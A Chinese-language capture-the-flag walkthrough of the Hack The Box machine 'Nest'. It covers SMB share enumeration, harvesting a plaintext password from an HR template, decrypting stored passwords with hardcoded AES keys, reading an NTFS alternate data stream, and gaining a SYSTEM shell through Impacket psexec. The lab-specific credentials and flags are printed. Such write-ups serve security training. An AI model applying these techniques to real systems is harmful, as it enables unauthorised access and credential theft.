[HTB]10.10.10.178-Nest

Port Scan

~/Documents/HTB/Nest root@kali
❯ cat nmap_All.txt
# Nmap 7.80 scan initiated Tue Feb  4 21:59:16 2020 as: nmap -sC -sV -oN nmap_All.txt -p- 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.33s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSVersionBindReqTCP, NULL, RPCCheck:
|     Reporting Service V1.2
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     Reporting Service V1.2
|_    Unrecognised command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=2/4%Time=5E397FB6%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>");

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb  4 22:30:41 2020 -- 1 IP address (1 host up) scanned in 1884.97 seconds

Nmap 显示共开放2个端口445和一个不知道是啥服务的端口。 445为SMB端口

~/Documents/HTB/Nest root@kali
❯ smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk
SMB1 disabled -- no workgroup available

4386为一个名为HQK Reporting服务，使用telnet可以交互[nc不行]

~/Documents/HTB/Nest root@kali
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>help debug


DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples:
DEBUG MyPassw0rd     Attempts to enable debug mode by using the
                     password "MyPassw0rd"

>

可以看到 执行DEBUG需要密码。故首先我们尝试找到密码。

User.txt

发现我们有权限访问SMB目录下DATA中的Share

~/Documents/HTB/Nest root@kali 9s
❯ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.

smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \IT\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Reports\*
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>

其中的 Welcome Email.txt 存在用户TempUser的用户凭证 welcome2019

~/Documents/HTB/Nest root@kali
❯ grep -rni "User" Shared/
Shared/Templates/HR/Welcome Email.txt:4:\\HTB-NEST\Users\<USERNAME>
Shared/Templates/HR/Welcome Email.txt:9:Username: TempUser

~/Documents/HTB/Nest root@kali
❯ grep -rni "password" Shared/
Shared/Templates/HR/Welcome Email.txt:10:Password: welcome2019

使用该用户凭证继续枚举，获得了许多文件。

~/Documents/HTB/Nest root@kali 43s
❯ smbclient \\\\10.10.10.178\\Data -U tempuser
Enter WORKGROUP\tempuser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \IT\Configs\Adobe\editing.xml of size 246 as editing.xml (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Configs\Adobe\Options.txt of size 0 as Options.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \IT\Configs\Adobe\projects.xml of size 258 as projects.xml (0.2 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \IT\Configs\Adobe\settings.xml of size 1274 as settings.xml (1.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Configs\Atlas\Temp.XML of size 1369 as Temp.XML (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \IT\Configs\Microsoft\Options.xml of size 4598 as Options.xml (1.1 KiloBytes/sec) (average 0.4 KiloBytes/sec)
getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (1.2 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \IT\Configs\NotepadPlusPlus\shortcuts.xml of size 2108 as shortcuts.xml (0.7 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (0.2 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.1 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \>

继续枚举，发现在RU_config.xml存在用户C.smith的用户凭证，但是我们可以容易看出，该密码非明文。

~/Documents/HTB/Nest root@kali
❯ grep -rni "password" IT/
IT/Configs/RU Scanner/RU_config.xml:5:  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

~/Documents/HTB/Nest root@kali
❯ grep -rni "user" IT/
IT/Configs/RU Scanner/RU_config.xml:4:  <Username>c.smith</Username>
IT/Configs/NotepadPlusPlus/config.xml:13:        <GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig>
IT/Configs/NotepadPlusPlus/config.xml:100:        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
IT/Configs/NotepadPlusPlus/shortcuts.xml:9:    <UserDefinedCommands>
IT/Configs/NotepadPlusPlus/shortcuts.xml:22:    </UserDefinedCommands>

尝试解密无果。手动检查每一个文件内的内容，在config.xml内发现目录Secure$\IT\Carl\

~/Documents/HTB/Nest root@kali
❯ cat config.xml
...
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

特别有意思的是你无法在IT下执行dir 但你有权限进入Carl

~/Documents/HTB/Nest root@kali 26s
❯ smbclient \\\\10.10.10.178\\Secure$ -U tempuser
Enter WORKGROUP\tempuser's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Aug  8 07:08:12 2019
  ..                                  D        0  Thu Aug  8 07:08:12 2019
  Finance                             D        0  Thu Aug  8 03:40:13 2019
  HR                                  D        0  Thu Aug  8 07:08:11 2019
  IT                                  D        0  Thu Aug  8 18:59:25 2019

                10485247 blocks of size 4096. 6545194 blocks available
smb: \> cd IT
smb: \IT\> dir
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\>
smb: \IT\Carl\> dir
  .                                   D        0  Thu Aug  8 03:42:14 2019
  ..                                  D        0  Thu Aug  8 03:42:14 2019
  Docs                                D        0  Thu Aug  8 03:44:00 2019
  Reports                             D        0  Tue Aug  6 21:45:40 2019
  VB Projects                         D        0  Tue Aug  6 22:41:55 2019

                10485247 blocks of size 4096. 6545194 blocks available

在目录 VB Projects/WIP/RU/RUScanner下发现存在加解密的方法的文件Utils.vb

~/Documents/HTB/Nest/VB Projects/WIP/RU/RUScanner root@kali
❯ cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function




    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                            encryptor, _
                                            CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

End Class

删除其加密的函数，保留解密函数，,了解vb的语法[此过程极为漫长]，在Main函数中调用解密函数解密之前加密的密码。

Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1

    Public Sub Main()

Console.WriteLine(DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="))
        Console.ReadLine()
    End Sub
    Public  Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
        End If
    End Function
    Public  Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

End Module

在https://dotnetfiddle.net/ 在线运行vb，的到C.smith加密后的用户凭证xRxRxPANCAK3SxRxRx 使用该用户凭证登录SMB 在该用户目录下获得User.txt

~/Documents/HTB/Nest root@kali 24m 48s
❯ smbclient \\\\10.10.10.178\\users -U c.smith
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jan 26 07:04:21 2020
  ..                                  D        0  Sun Jan 26 07:04:21 2020
  Administrator                       D        0  Fri Aug  9 23:08:23 2019
  C.Smith                             D        0  Sun Jan 26 15:21:44 2020
  L.Frost                             D        0  Fri Aug  9 01:03:01 2019
  R.Thompson                          D        0  Fri Aug  9 01:02:50 2019
  TempUser                            D        0  Thu Aug  8 06:55:56 2019

                10485247 blocks of size 4096. 6447114 blocks available
smb: \> cd C.smith
smb: \C.smith\> dir
  .                                   D        0  Sun Jan 26 15:21:44 2020
  ..                                  D        0  Sun Jan 26 15:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 07:06:17 2019
  user.txt                            A       32  Fri Aug  9 07:05:24 2019

                10485247 blocks of size 4096. 6447114 blocks available
smb: \C.smith\> get user.txt
getting file \C.smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

~/Documents/HTB/Nest root@kali
❯ cat user.txt
cf71b25404be5d84fd827e05f426e987

Root.txt

我们发现在C.smith用户目录下还存在目录HQK Reporting，在该目录下存在 Debug Mode Password.txt

smb: \C.smith\> cd "HQK Reporting"
smb: \C.smith\HQK Reporting\> dir
  .                                   D        0  Fri Aug  9 07:06:17 2019
  ..                                  D        0  Fri Aug  9 07:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 20:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 07:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 07:09:05 2019

                10485247 blocks of size 4096. 6543918 blocks available
smb: \C.smith\HQK Reporting\>

但是其大小为 0,将它get到本地后也无法获得更多有用信息。 卡住，此时论坛老哥告诉我NTFS硬盘格式存在一种隐写术NTFS Steganography，但是用该方法不能使用网络传输文件。所以我只能使用windows挂载该SMB。 使用上述文章的方法获得4386端口的密码 WBQ201953D8w

C:\Users\7737>dir Z:\
 驱动器 Z 中的卷没有标签。
 卷的序列号是 2C6F-6A14

 Z:\ 的目录

2020/01/26  07:04    <DIR>          .
2020/01/26  07:04    <DIR>          ..
2019/08/09  23:08    <DIR>          Administrator
2020/01/26  15:21    <DIR>          C.Smith
2019/08/09  01:03    <DIR>          L.Frost
2019/08/09  01:02    <DIR>          R.Thompson
2019/08/08  06:55    <DIR>          TempUser
               0 个文件              0 字节
               7 个目录 26,803,638,272 可用字节

C:\Users\7737>dir /r "Z:\C.Smith\HQK Reporting"
 驱动器 Z 中的卷没有标签。
 卷的序列号是 2C6F-6A14

 Z:\C.Smith\HQK Reporting 的目录

2019/08/09  07:06    <DIR>          .
2019/08/09  07:06    <DIR>          ..
2019/08/09  20:18    <DIR>          AD Integration Module
2019/08/09  07:08                 0 Debug Mode Password.txt
                                 15 Debug Mode Password.txt:Password:$DATA
2019/08/09  07:09               249 HQK_Config_Backup.xml
               2 个文件            249 字节
               3 个目录 26,407,178,240 可用字节

C:\Users\7737>type "Z:\C.Smith\HQK Reporting\Debug Mode Password.txt:Password:$DATA"
WBQ201953D8w

C:\Users\7737>

使用该密码进入debug模式,枚举后在LDAP内发现adminstrator加密后的密码以及一个可执行文件。

~/Documents/HTB/Nest root@kali
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available

>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

使用之前的解密代码进行解密，无果。对二进制进行逆向，在CR内发现了一个新的salt

namespace HqkLdap
{
// Token: 0x02000007 RID: 7
    public class CR
    {
        // Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
        public static string DS(string EncryptedString)
        {
            if (string.IsNullOrEmpty(EncryptedString))
            {
                return string.Empty;
            }
            return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
        }

替换上述代码中的salt，获得administrator的密码 XtH4nkS4Pl4y1nGX 由于是administrator账户对SMB下的目录都有写入权限，使用psexec获得root.txt

~/Documents/HTB/Nest root@kali
❯ psexec.py 'administrator:XtH4nkS4Pl4y1nGX@10.10.10.178'
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file fLgfGSwC.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service xaOM on 10.10.10.178.....
[*] Starting service xaOM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>type root.txt
6594c2eb084bc0f08a42f0b94b878c41
C:\Users\Administrator\Desktop>